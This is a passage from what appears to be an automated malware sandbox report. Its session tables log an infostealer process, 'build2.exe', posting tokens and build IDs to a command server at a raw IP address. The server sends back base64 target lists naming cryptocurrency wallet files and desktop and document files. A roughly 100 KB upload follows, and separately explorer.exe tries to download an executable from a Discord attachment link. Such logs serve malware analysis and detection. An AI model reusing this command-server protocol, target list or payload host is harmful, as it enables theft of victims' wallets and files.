                                                                                              26192.168.2.44980465.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:25 UTC279OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFB
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 1145
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:25 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------KFCFBFHIEBKJKFHIEBFBCont
                                                                                              2024-05-25 19:30:26 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:26 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2ok0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.44980765.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:27 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:27 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------CGHCGIIDGDAKFIEBKFCFCont
                                                                                              2024-05-25 19:30:27 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:27 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                              Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.44980865.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:28 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDA
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------CAFBGDHCBAEHIDGCGIDACont
                                                                                              2024-05-25 19:30:29 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:29 UTC223INData Raw: 64 34 0d 0a 5a 47 56 6a 64 57 31 6c 62 6e 52 7a 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 4c 6e 52 34 64 43 77 71 4c 6d 52 76 59 79 77 71 4c 6d 52 76 59 33 67 73 4b 69 35 79 64 47 59 73 4b 69 35 34 62 48 4d 73 4b 69 35 34 62 48 4e 34 66 44 45 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 4a 30 5a 69 77 71 4c 6e 68 73 63 79 77 71 4c 6e 68 73 63 33 68 38 4d 54 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: d4ZGVjdW1lbnRzfCVET0NVTUVOVFMlXHwqLnR4dCwqLmRvYywqLmRvY3gsKi5ydGYsKi54bHMsKi54bHN4fDE1MHxmYWxzZXwqd2luZG93cyp8REVTS1RPUHwlREVTS1RPUCVcfCoudHh0LCouZG9jLCouZG9jeCwqLnJ0ZiwqLnhscywqLnhsc3h8MTUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              29192.168.2.44980965.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:30 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----BGHJEBKJEGHJKECAAKJK
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 453
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:30 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------BGHJEBKJEGHJKECAAKJKCont
                                                                                              2024-05-25 19:30:31 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2ok0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              30192.168.2.449812162.159.134.2334432580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:32 UTC310OUTGET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: cdn.discordapp.com
                                                                                              2024-05-25 19:30:32 UTC1066INHTTP/1.1 404 Not Found
                                                                                              Date: Sat, 25 May 2024 19:30:32 GMT
                                                                                              Content-Type: text/plain;charset=UTF-8
                                                                                              Content-Length: 36
                                                                                              Connection: close
                                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                              Set-Cookie: __cf_bm=_hnx.RasMHd9rAKtQBpiugUN70R9RGSs0a3As8OUYhs-1716665432-1.0.1.1-LMEPxQarqfdvcfblA_as1y5sxEH7NpD4UFtDd9qLMmuZeJm.LuMhukMUSc4NN_d8ONEJPfSM15yZZ1hUjlei.Q; path=/; expires=Sat, 25-May-24 20:00:32 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0dKLbD%2BiyBGP73Z6bVXwH%2FG%2Bkvxq4AAiW14%2B17Gxsui30bAluOyYJUaKH6oYX1Kk%2B8GVcwAawVDDol1JlKjRwOtU6Mk71NnR1SRRLlIZVKwhEypcR2qOzQXUpOmOBanOgPgThg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Set-Cookie: _cfuvid=pE84G.l23IqgyDRvhY6ciPU_hh1g3L9g.guRFnWtMhM-1716665432343-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8897f0c81c3478e2-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-05-25 19:30:32 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                                                                              Data Ascii: This content is no longer available.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              31192.168.2.44981165.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:32 UTC281OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----FCFHJKJJJECGDHJJDHDA
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 104621
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------FCFHJKJJJECGDHJJDHDACont
                                                                                              2024-05-25 19:30:32 UTC16355OUTData Raw: 70 53 73 6e 4f 31 31 66 54 53 2f 77 44 6d 64 64 65 76 69 73 52 54 68 54 71 4a 74 51 76 5a 32 64 39 62 62 2f 63 51 30 55 73 53 76 4f 38 61 51 52 53 79 74 4b 78 53 4d 52 78 73 32 39 67 4d 6b 44 41 35 49 48 4f 50 53 6c 6d 6a 6c 74 70 4a 49 37 69 43 65 47 53 4a 51 38 69 79 52 4d 70 52 53 63 41 6b 45 63 44 4a 48 4a 72 73 39 72 43 39 72 6f 35 50 59 31 47 72 38 72 74 36 44 61 4b 52 38 78 78 4c 4c 49 6a 70 47 2b 4e 72 73 68 43 74 6e 6b 59 50 51 30 48 4b 6c 41 59 35 51 58 63 52 70 6d 4e 76 6d 59 67 45 41 63 63 6b 68 6c 4f 50 51 6a 31 70 2b 30 68 33 46 37 4b 70 2f 4b 2f 75 46 70 4b 43 53 72 68 48 56 30 59 35 77 48 51 71 54 67 6b 48 72 36 45 45 66 55 47 6a 6b 37 53 46 63 68 6e 38 74 53 46 4a 44 4e 78 38 6f 39 54 79 4f 50 65 6a 6e 6a 61 39 77 39 6e 4e 4f 7a 57 6f 56
                                                                                              Data Ascii: pSsnO11fTS/wDmddevisRThTqJtQvZ2d9bb/cQ0UsSvO8aQRSytKxSMRxs29gMkDA5IHOPSlmjltpJI7iCeGSJQ8iyRMpRScAkEcDJHJrs9rC9ro5PY1Gr8rt6DaKR8xxLLIjpG+NrshCtnkYPQ0HKlAY5QXcRpmNvmYgEAcckhlOPQj1p+0h3F7Kp/K/uFpKCSrhHV0Y5wHQqTgkHr6EEfUGjk7SFchn8tSFJDNx8o9TyOPejnja9w9nNOzWoV
                                                                                              2024-05-25 19:30:32 UTC16355OUTData Raw: 42 79 57 73 65 48 62 54 55 56 76 49 34 59 34 34 4a 6f 35 52 35 52 52 51 42 2f 71 30 4f 43 42 32 7a 58 6e 4e 7a 62 53 32 6c 77 38 45 36 46 4a 45 4f 43 44 58 73 38 2b 6c 32 46 31 4b 5a 5a 37 4f 43 57 51 39 57 65 4d 45 6d 76 4c 2f 46 30 45 56 74 34 6c 75 59 59 49 30 6a 6a 55 4a 68 45 47 41 50 6c 42 36 56 37 47 55 56 35 71 70 37 4c 6f 66 4f 35 2f 68 61 62 70 65 33 74 37 79 30 39 54 44 6f 6f 6f 72 36 4d 2b 50 45 78 52 52 52 51 4d 4b 53 6c 6f 6f 41 53 69 6c 6f 6f 41 53 69 69 69 67 42 4d 55 55 74 4a 33 6f 47 46 46 46 46 41 42 53 55 74 46 41 78 4b 4b 57 6b 70 67 4c 52 69 69 69 6b 41 6c 4a 33 70 61 4b 59 42 52 52 52 51 4d 53 69 69 69 67 41 4e 4a 53 30 6c 41 77 6f 6f 6f 6f 41 53 69 6c 70 4b 59 42 52 52 32 6f 70 41 46 4a 53 30 6c 41 77 6f 6f 6f 70 67 46 46 46 46 41
                                                                                              Data Ascii: ByWseHbTUVvI4Y44Jo5R5RRQB/q0OCB2zXnNzbS2lw8E6FJEOCDXs8+l2F1KZZ7OCWQ9WeMEmvL/F0EVt4luYYI0jjUJhEGAPlB6V7GUV5qp7LofO5/habpe3t7y09TDooor6M+PExRRRQMKSlooASilooASiiigBMUUtJ3oGFFFFABSUtFAxKKWkpgLRiiikAlJ3paKYBRRRQMSiiigANJS0lAwooooASilpKYBRR2opAFJS0lAwooopgFFFFA
                                                                                              2024-05-25 19:30:32 UTC16355OUTData Raw: 57 6e 30 55 57 51 58 59 55 6c 4c 69 67 30 78 43 55 55 55 55 41 46 46 46 46 41 43 55 55 55 55 41 46 46 46 46 4d 41 6f 6f 6f 70 41 46 46 46 46 4d 41 70 4b 57 6b 6f 47 46 46 46 46 41 42 52 52 52 51 41 55 6c 4c 53 55 44 43 6b 70 61 4b 41 45 6f 6f 6f 6f 41 51 30 55 74 4a 51 4d 4b 4b 4b 4b 41 43 69 69 69 67 59 6c 46 47 4b 4b 59 43 47 6c 70 44 53 30 68 69 55 55 55 55 41 4a 52 53 34 70 4b 59 78 44 52 53 30 6c 41 42 53 55 74 4a 51 4d 4b 51 30 74 49 61 59 42 52 52 52 51 41 47 6b 70 61 54 76 54 47 46 46 46 46 49 42 4b 4b 4b 4b 59 77 4e 4a 53 6d 6b 6f 41 4b 4b 4b 4b 59 78 4b 4b 4b 4b 41 43 6b 70 61 4b 59 43 55 68 70 61 44 51 4d 53 69 69 69 67 42 4b 4b 4b 4b 42 68 52 52 53 55 77 46 70 44 52 52 51 4d 4b 4b 4b 4b 41 45 4e 46 4b 61 53 67 61 44 2b 49 66 57 75 67 75 2f 38
                                                                                              Data Ascii: Wn0UWQXYUlLig0xCUUUUAFFFFACUUUUAFFFFMAooopAFFFFMApKWkoGFFFFABRRRQAUlLSUDCkpaKAEooooAQ0UtJQMKKKKACiiigYlFGKKYCGlpDS0hiUUUUAJRS4pKYxDRS0lABSUtJQMKQ0tIaYBRRRQAGkpaTvTGFFFFIBKKKKYwNJSmkoAKKKKYxKKKKACkpaKYCUhpaDQMSiiigBKKKKBhRRSUwFpDRRQMKKKKAENFKaSgaD+IfWugu/8
                                                                                              2024-05-25 19:30:32 UTC16355OUTData Raw: 5a 4c 49 71 6a 2b 31 2b 48 6e 62 76 33 39 44 58 70 4b 77 46 31 65 61 30 74 4c 69 37 67 74 37 65 53 5a 4c 66 54 59 6f 30 6b 6a 56 6b 6a 4d 31 74 76 65 52 6c 50 44 45 6c 63 5a 49 49 79 78 50 58 46 57 6d 31 69 53 4f 33 47 6f 4e 61 32 37 58 4b 36 59 31 30 62 5a 56 41 6a 65 52 62 6a 79 52 4a 73 47 42 74 77 64 78 41 47 4d 71 65 4d 5a 46 4c 2b 31 61 64 72 74 50 38 41 34 4e 72 2f 41 4a 46 50 68 2b 73 70 4b 50 4d 72 75 7a 2b 54 30 4e 57 69 73 4d 65 49 56 68 69 30 75 39 31 4f 4b 43 4e 35 62 69 34 74 57 65 43 42 66 4c 4a 45 61 74 48 49 30 53 67 4b 77 52 6e 47 34 41 63 6a 48 42 36 47 37 62 7a 58 4b 7a 67 36 68 4c 59 6d 53 53 46 5a 45 6c 74 41 45 69 6d 51 39 48 56 51 46 78 30 78 39 30 48 49 35 47 63 31 74 52 78 30 61 6c 54 32 64 72 50 2b 76 36 2f 70 6e 4c 69 4d 71 6e
                                                                                              Data Ascii: ZLIqj+1+Hnbv39DXpKwF1ea0tLi7gt7eSZLfTYo0kjVkjM1tveRlPDElcZIIyxPXFWm1iSO3GoNa27XK6Y10bZVAjeRbjyRJsGBtwdxAGMqeMZFL+1adrtP8A4Nr/AJFPh+spKPMruz+T0NWisMeIVhi0u91OKCN5bi4tWeCBfLJEatHI0SgKwRnG4AcjHB6G7bzXKzg6hLYmSSFZEltAEimQ9HVQFx0x90HI5Gc1tRx0alT2drP+v6/pnLiMqn
                                                                                              2024-05-25 19:30:32 UTC16355OUTData Raw: 31 74 76 34 34 31 47 32 74 59 62 64 4c 65 30 4b 78 49 71 4b 57 56 73 6b 41 59 35 2b 61 70 50 2b 45 2f 31 54 2f 6e 32 73 76 2b 2b 48 2f 2b 4b 72 6a 30 6c 44 74 64 68 57 69 50 32 57 32 57 36 6b 4f 2f 67 78 73 41 77 78 78 79 64 70 7a 6a 6a 67 48 30 70 70 75 55 46 75 5a 39 38 57 78 56 68 59 71 48 4f 34 65 62 76 32 63 59 37 68 43 65 76 51 69 75 44 36 76 6c 2f 77 44 54 66 58 35 6e 71 2f 58 4d 34 31 33 30 76 30 6a 30 2b 52 32 50 2f 43 66 61 72 2f 7a 37 57 58 2f 66 44 2f 38 41 78 56 51 33 58 6a 62 55 37 75 7a 6e 74 6e 67 73 77 6b 30 62 52 73 56 52 73 67 45 59 4f 50 6d 39 36 35 52 70 38 52 68 78 35 62 5a 74 57 75 67 6f 59 37 69 69 79 69 4c 47 4d 64 64 78 48 46 54 42 57 61 4c 55 48 56 34 48 2f 73 39 59 7a 64 49 6b 68 4c 52 6c 73 2f 4c 30 77 53 75 30 35 77 65 50 66
                                                                                              Data Ascii: 1tv441G2tYbdLe0KxIqKWVskAY5+apP+E/1T/n2sv++H/+Krj0lDtdhWiP2W2W6kO/gxsAwxxydpzjjgH0ppuUFuZ98WxVhYqHO4ebv2cY7hCevQiuD6vl/wDTfX5nq/XM4130v0j0+R2P/Cfar/z7WX/fD/8AxVQ3XjbU7uzntngswk0bRsVRsgEYOPm965Rp8Rhx5bZtWugoY7iiyiLGMddxHFTBWaLUHV4H/s9YzdIkhLRls/L0wSu05wePf
                                                                                              2024-05-25 19:30:32 UTC6491OUTData Raw: 4d 49 72 64 37 71 63 46 64 78 58 43 5a 69 42 79 47 2b 59 67 44 61 4f 63 48 6d 67 44 72 36 4b 34 65 44 57 4e 61 6e 73 6f 37 55 33 55 31 76 63 6a 56 2f 73 54 53 7a 52 77 6d 58 79 7a 47 58 2b 59 4a 6d 50 63 4d 39 52 78 77 4d 6a 71 4b 30 37 51 36 6c 71 65 70 33 38 43 61 76 63 57 38 4f 6d 79 70 62 6a 62 46 45 57 75 47 32 4b 37 50 4a 6c 4f 68 33 41 41 4a 74 36 48 32 77 4c 58 2b 76 54 2f 4e 42 2f 58 39 66 63 64 46 46 4e 46 4f 47 4d 55 71 53 42 57 4b 4d 55 59 48 44 44 67 67 2b 34 39 4b 66 58 42 77 7a 36 68 70 30 4e 31 71 4d 56 2b 79 77 4c 72 6a 51 74 61 43 4a 43 6a 6f 38 77 52 69 78 49 33 62 73 74 6b 45 45 44 67 63 48 6d 75 38 6f 57 73 55 2f 36 32 54 2f 55 48 75 30 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46
                                                                                              Data Ascii: MIrd7qcFdxXCZiByG+YgDaOcHmgDr6K4eDWNanso7U3U1vcjV/sTSzRwmXyzGX+YJmPcM9RxwMjqK07Q6lqep38CavcW8OmypbjbFEWuG2K7PJlOh3AAJt6H2wLX+vT/NB/X9fcdFFNFOGMUqSBWKMUYHDDgg+49KfXBwz6hp0N1qMV+ywLrjQtaCJCjo8wRixI3bstkEEDgcHmu8oWsU/62T/UHu0FFFFABRRRQAUUUUAFFFFABRRRQAUUUUAF
                                                                                              2024-05-25 19:30:33 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2ok0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              32192.168.2.44981365.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:34 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----DHJECFCGHIDGHIDHDHIE
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
